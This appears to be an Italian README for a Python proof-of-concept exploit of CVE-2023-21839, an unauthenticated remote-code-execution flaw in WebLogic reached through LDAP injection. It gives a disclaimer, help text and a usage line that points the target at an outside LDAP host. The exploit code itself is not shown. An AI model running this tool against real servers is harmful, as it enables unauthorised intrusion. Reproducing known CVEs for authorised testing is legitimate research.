
Proof-of-concept in Python per l'exploit di CVE-2023-21839 che prende di mira i server WebLogic tramite iniezione LDAP per l'esecuzione remota di codice non autenticata.
In base a esigenze particolari, ho tradotto in Python la versione Go del maestro @4ra1n. Grazie ancora!
Questo programma deve essere utilizzato esclusivamente per scopi autorizzati di test di sicurezza e ricerca. Si prega di utilizzarlo in conformità con la legge sulla sicurezza informatica.
L'autore non è responsabile per eventuali attacchi illegali o altre attività illecite compiute dagli utilizzatori di questo strumento.
Riproduzione su vulhub: link
___ __ ____ ___ ____ _____ ____ _ ___ _____ ___
/ __\/\ /\/__\ |___ \ / _ \___ \|___ / |___ \/ |( _ )___ // _ \
/ / \ \ / /_\_____ __) | | | |__) | |_ \ _____ __) | |/ _ \ |_ \ (_) |
/ /___ \ V //_|_____/ __/| |_| / __/ ___) |_____/ __/| | (_) |__) \__, |
\____/ \_/\__/ |_____|\___/_____|____/ |_____|_|\___/____/ /_/
usage: CVE-2023-21839.py [-h] [-ip] [-p] [-l]
Please enter parameters
optional arguments:
-h, --help show this help message and exit
-ip , --ip target ip
-p , --port target port
-l , --ldap ldap
python3 CVE-2023-21839.py -ip xx -p xx -l ldap://xx
